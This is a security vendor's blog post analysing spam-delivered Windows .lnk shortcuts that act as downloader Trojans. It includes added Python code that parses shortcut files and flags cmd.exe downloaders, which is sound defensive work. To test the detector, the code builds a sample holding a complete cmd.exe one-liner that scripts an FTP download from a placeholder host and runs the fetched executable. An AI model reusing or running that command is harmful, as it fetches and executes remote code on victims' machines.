A Long Shortcut

Filed Under: SophosLabs

Driving to family for Christmas, some of you may have tried taking a shortcut to avoid traffic queues. Sometimes those "shortcuts" can end up longer than the original route, but hopefully they did not get you into as much trouble as some of the shortcuts we have been seeing in spam recently.

I am talking about Windows ".lnk" shortcut files. Question: Can a shortcut cause a legitimate application on your computer to do malicious things?

Answer: Yes, easily. Take a look at the following, which arrived via one of our spam traps this morning:

[Image: Shortcut Properties page]

"Target" shows just the start of the command: the real payload is a long argument string stored inside the .lnk file, of which the Properties dialog displays only the beginning, so the full command line is effectively a script. You can see enough to get the idea: the shortcut launches the command shell (cmd.exe), which echoes a series of commands into a script to be executed, the first of which opens a connection to a remote site. You can probably guess what the next command is: "get", to download a file, which is then executed. In short, this .lnk file is a downloader Trojan.

Over the past few weeks we have seen an increasing number of such shortcut links sent out in spam. This morning's was detected as Troj/DownLnk-A. Previous examples include Troj/Dloadr-BVT. Since today was a fairly quiet day I have had time to prepare some generic detection for this technique. Over the next few days we will be scanning the web looking for where the technique is used, whether it has any legitimate uses, and if so how to differentiate legitimate samples from malware.
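Generic detection of this trick means reading the shortcut's full argument string rather than what the Properties dialog shows. The following is an added example, not SophosLabs' detection and not code from this post: a minimal parser for the Shell Link binary format (MS-SHLLINK, the .lnk format) that walks the header, skips the optional ID list and LinkInfo blocks, and pulls out the StringData fields, followed by a heuristic that flags a shortcut whose target is cmd.exe and whose arguments look like an echoed download script. The sample shortcut is constructed in memory; its hostname (`files.example.invalid`) and filenames are placeholders, and the echoed `open`/`get`/`bye` sequence feeding `ftp -s:` is assumed as the classic shape of such a script, not copied from the sample in the post.

```python
"""Minimal MS-SHLLINK (.lnk) parser plus a heuristic for cmd.exe downloader shortcuts.

Added example, not SophosLabs code. Sample shortcuts are constructed below.
"""
import struct
from typing import Optional

# {00021401-0000-0000-C000-000000000046}, the Shell Link CLSID, as it appears on disk
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits that decide which optional structures precede StringData
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order, each only if its flag is set
STRING_DATA_ORDER = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk(data: bytes) -> dict:
    """Parse the 76-byte header and the StringData of a .lnk; returns flags plus any strings present."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76

    def take(n: int) -> bytes:
        nonlocal pos
        if pos + n > len(data):
            raise ValueError("truncated Shell Link file")
        chunk = data[pos:pos + n]
        pos += n
        return chunk

    if flags & HAS_LINK_TARGET_ID_LIST:          # 2-byte IDListSize, then the item IDs
        take(struct.unpack("<H", take(2))[0])
    if flags & HAS_LINK_INFO:                    # 4-byte LinkInfoSize that includes itself
        size = struct.unpack("<I", take(4))[0]
        if size < 4:
            raise ValueError("bad LinkInfoSize")
        take(size - 4)

    result = {"flags": flags}
    for flag, name in STRING_DATA_ORDER:
        if flags & flag:
            count = struct.unpack("<H", take(2))[0]   # CountCharacters, no terminator follows
            if flags & IS_UNICODE:
                result[name] = take(2 * count).decode("utf-16-le")
            else:
                result[name] = take(count).decode("cp1252", errors="replace")
    return result


def build_lnk(relative_path: str, arguments: Optional[str] = None) -> bytes:
    """Build a minimal Unicode .lnk with a relative target and optional arguments (test data only)."""
    flags = HAS_RELATIVE_PATH | IS_UNICODE | (HAS_ARGUMENTS if arguments is not None else 0)
    header = struct.pack("<I16sIIQQQIIIHHII",
                         0x4C, LNK_CLSID, flags,
                         0x20,         # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,      # creation/access/write FILETIMEs
                         0, 0,         # FileSize, IconIndex
                         1,            # ShowCommand = SW_SHOWNORMAL
                         0, 0, 0, 0)   # HotKey, Reserved1..3

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = string_data(relative_path)
    if arguments is not None:
        body += string_data(arguments)
    return header + body + b"\x00\x00\x00\x00"   # TerminalBlock closes the ExtraData section


def assess_shortcut(data: bytes, max_args: int = 100) -> list:
    """Reasons a shortcut looks like a cmd.exe downloader; an empty list means nothing was seen."""
    info = parse_lnk(data)
    target = info.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = info.get("arguments", "")
    low = args.lower()
    reasons = []
    if target == "cmd.exe":
        reasons.append("target is the command shell")
    if len(args) > max_args:
        reasons.append("unusually long argument string (%d characters)" % len(args))
    if "echo " in low and "open " in low and "get " in low:
        reasons.append("arguments echo 'open' and 'get' commands, i.e. a scripted download")
    if low.count("echo ") >= 2 and any(sep in args for sep in ("&", "|")):
        reasons.append("several chained commands packed into one argument string")
    return reasons


def is_shortcut_downloader(data: bytes) -> bool:
    """Verdict: a shell target plus at least one script-like trait in the arguments."""
    reasons = assess_shortcut(data)
    return "target is the command shell" in reasons and len(reasons) >= 2


# Constructed samples (assumed shape; placeholder host and filenames, nothing from the post's sample)
SAMPLE_ARGS = ("/c echo open files.example.invalid>s.txt&echo anonymous>>s.txt&echo binary>>s.txt"
               "&echo get update.exe>>s.txt&echo bye>>s.txt&ftp -s:s.txt&update.exe")
MALICIOUS_LNK = build_lnk("..\\..\\..\\Windows\\System32\\cmd.exe", SAMPLE_ARGS)
BENIGN_LNK = build_lnk("..\\..\\..\\Windows\\System32\\notepad.exe", "C:\\Users\\Public\\notes.txt")

if __name__ == "__main__":
    for label, blob in (("constructed malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, is_shortcut_downloader(blob), assess_shortcut(blob))
```

The parser only needs the header and StringData, so it deliberately skips the item ID list and LinkInfo by their size prefixes; a shortcut whose target lives only in the ID list (no relative path) will show an empty target here, which is the first thing to extend for real triage. Any shortcut that trips `is_shortcut_downloader` is worth a human look, while the argument string itself is what you would feed into a generic signature.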

Meanwhile, stay safe online. Do not click on links from sources you do not trust or that seem out of context. Do not assume any kind of file attachment is safe - the bad guys are always making use of new tricks and exploits.

I also hope those of you still travelling have safe journeys over this festive season.

Robert
